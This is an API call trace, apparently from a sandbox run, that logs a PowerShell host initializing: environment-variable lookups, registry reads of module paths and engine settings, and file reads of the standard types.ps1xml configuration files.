	[0734.675] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0734.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.675] CoTaskMemFree (pv=0x43e4f0) 
	[0734.676] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0734.676] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.677] CoTaskMemFree (pv=0x43e4f0) 
	[0734.677] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0734.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.677] CoTaskMemFree (pv=0x43e4f0) 
	[0734.678] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0734.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.678] CoTaskMemFree (pv=0x43e4f0) 
	[0734.680] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0734.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.680] CoTaskMemFree (pv=0x43e4f0) 
	[0734.684] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0734.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.684] CoTaskMemFree (pv=0x43e4f0) 
	[0734.685] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0734.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.685] CoTaskMemFree (pv=0x43e4f0) 
	[0734.686] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0734.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.686] CoTaskMemFree (pv=0x43e4f0) 
	[0742.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.264] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0742.264] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0742.264] CoTaskMemFree (pv=0x43e4f0) 
	[0742.266] CoTaskMemAlloc (cb=0xcc) returned 0x1b851970
	[0742.266] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b851970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0742.266] CoTaskMemFree (pv=0x1b851970) 
	[0742.266] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d7c8 | out: phkResult=0x20d7c8*=0x308) returned 0x0
	[0742.266] RegQueryValueExW (in: hKey=0x308, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x20d74c, lpData=0x0, lpcbData=0x20d748*=0x0 | out: lpType=0x20d74c*=0x2, lpData=0x0, lpcbData=0x20d748*=0x6c) returned 0x0
	[0742.266] CoTaskMemAlloc (cb=0x70) returned 0x483220
	[0742.266] RegQueryValueExW (in: hKey=0x308, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x20d71c, lpData=0x483220, lpcbData=0x20d718*=0x6c | out: lpType=0x20d71c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x20d718*=0x6c) returned 0x0
	[0743.508] CoTaskMemFree (pv=0x483220) 
	[0743.508] CoTaskMemAlloc (cb=0xcc) returned 0x1b851970
	[0743.509] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b851970, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0743.509] CoTaskMemFree (pv=0x1b851970) 
	[0743.509] CoTaskMemAlloc (cb=0xcc) returned 0x1b851970
	[0743.509] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b851970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0743.509] CoTaskMemFree (pv=0x1b851970) 
	[0743.513] RegCloseKey (hKey=0x308) returned 0x0
	[0743.513] CoTaskMemAlloc (cb=0xcc) returned 0x1b851970
	[0743.513] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b851970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0743.513] CoTaskMemFree (pv=0x1b851970) 
	[0743.513] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d7c8 | out: phkResult=0x20d7c8*=0x308) returned 0x0
	[0743.513] RegQueryValueExW (in: hKey=0x308, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x20d74c, lpData=0x0, lpcbData=0x20d748*=0x0 | out: lpType=0x20d74c*=0x0, lpData=0x0, lpcbData=0x20d748*=0x0) returned 0x2
	[0743.513] RegCloseKey (hKey=0x308) returned 0x0
	[0743.519] CoTaskMemAlloc (cb=0x20c) returned 0x4d9240
	[0743.519] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x4d9240 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0743.520] CoTaskMemFree (pv=0x4d9240) 
	[0743.520] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x20d350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0743.522] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0743.533] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0743.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.533] CoTaskMemFree (pv=0x43e4f0) 
	[0743.535] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0743.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.535] CoTaskMemFree (pv=0x43e4f0) 
	[0743.539] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0743.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.539] CoTaskMemFree (pv=0x43e4f0) 
	[0743.539] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0743.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.539] CoTaskMemFree (pv=0x43e4f0) 
	[0743.541] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d5b8 | out: phkResult=0x20d5b8*=0x310) returned 0x0
	[0743.542] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x20d5cc, lpData=0x0, lpcbData=0x20d5c8*=0x0 | out: lpType=0x20d5cc*=0x1, lpData=0x0, lpcbData=0x20d5c8*=0x74) returned 0x0
	[0743.542] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x20d53c, lpData=0x0, lpcbData=0x20d538*=0x0 | out: lpType=0x20d53c*=0x1, lpData=0x0, lpcbData=0x20d538*=0x74) returned 0x0
	[0743.542] CoTaskMemAlloc (cb=0x78) returned 0x483220
	[0743.542] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x20d50c, lpData=0x483220, lpcbData=0x20d508*=0x74 | out: lpType=0x20d50c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x20d508*=0x74) returned 0x0
	[0743.542] CoTaskMemFree (pv=0x483220) 
	[0743.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x20d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0743.543] SetErrorMode (uMode=0x1) returned 0x1
	[0743.543] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x20d490 | out: lpFileInformation=0x20d490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0743.543] SetErrorMode (uMode=0x1) returned 0x1
	[0743.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0743.544] SetErrorMode (uMode=0x1) returned 0x1
	[0743.544] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d490 | out: lpFileInformation=0x20d490*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0743.544] SetErrorMode (uMode=0x1) returned 0x1
	[0743.545] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0743.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.545] CoTaskMemFree (pv=0x43e4f0) 
	[0744.798] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0744.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0744.798] CoTaskMemFree (pv=0x43e4f0) 
	[0744.799] GetACP () returned 0x4e4
	[0744.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0744.817] SetErrorMode (uMode=0x1) returned 0x1
	[0744.818] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0744.819] GetFileType (hFile=0x314) returned 0x1
	[0744.819] SetErrorMode (uMode=0x1) returned 0x1
	[0744.819] GetFileType (hFile=0x314) returned 0x1
	[0744.822] ReadFile (in: hFile=0x314, lpBuffer=0x2cd6f60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6f60*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.824] ReadFile (in: hFile=0x314, lpBuffer=0x2cd6f60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6f60*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.824] ReadFile (in: hFile=0x314, lpBuffer=0x2cd6f60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6f60*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.825] ReadFile (in: hFile=0x314, lpBuffer=0x2cd6f60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6f60*, lpNumberOfBytesRead=0x20d3c8*=0xcf3, lpOverlapped=0x0) returned 1
	[0744.825] ReadFile (in: hFile=0x314, lpBuffer=0x2cd63bb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd63bb*, lpNumberOfBytesRead=0x20d3c8*=0x0, lpOverlapped=0x0) returned 1
	[0744.825] ReadFile (in: hFile=0x314, lpBuffer=0x2cd6f60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6f60*, lpNumberOfBytesRead=0x20d3c8*=0x0, lpOverlapped=0x0) returned 1
	[0744.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0744.828] SetErrorMode (uMode=0x1) returned 0x1
	[0744.828] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d340 | out: lpFileInformation=0x20d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0744.828] SetErrorMode (uMode=0x1) returned 0x1
	[0744.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0744.830] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d428 | out: phkResult=0x20d428*=0x314) returned 0x0
	[0744.830] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d3ac, lpData=0x0, lpcbData=0x20d3a8*=0x0 | out: lpType=0x20d3ac*=0x1, lpData=0x0, lpcbData=0x20d3a8*=0x56) returned 0x0
	[0744.830] CoTaskMemAlloc (cb=0x5a) returned 0x4f2850
	[0744.830] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d37c, lpData=0x4f2850, lpcbData=0x20d378*=0x56 | out: lpType=0x20d37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d378*=0x56) returned 0x0
	[0744.830] CoTaskMemFree (pv=0x4f2850) 
	[0744.830] RegCloseKey (hKey=0x314) returned 0x0
	[0744.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0744.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0747.651] VirtualQuery (in: lpAddress=0x20c110, lpBuffer=0x20cfd0, dwLength=0x30 | out: lpBuffer=0x20cfd0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0747.662] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0747.663] GetFileType (hFile=0x314) returned 0x1
	[0747.663] SetErrorMode (uMode=0x1) returned 0x1
	[0747.663] GetFileType (hFile=0x314) returned 0x1
	[0747.663] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.664] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.664] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.665] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.665] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.667] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.667] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.667] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.667] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.669] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.669] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.670] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.670] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.670] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.671] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.671] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.671] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.675] ReadFile (in: hFile=0x314, lpBuffer=0x2d3e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d3c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3e120*, lpNumberOfBytesRead=0x20d3c8*=0x1000, lpOverlapped=0x0) returned 1
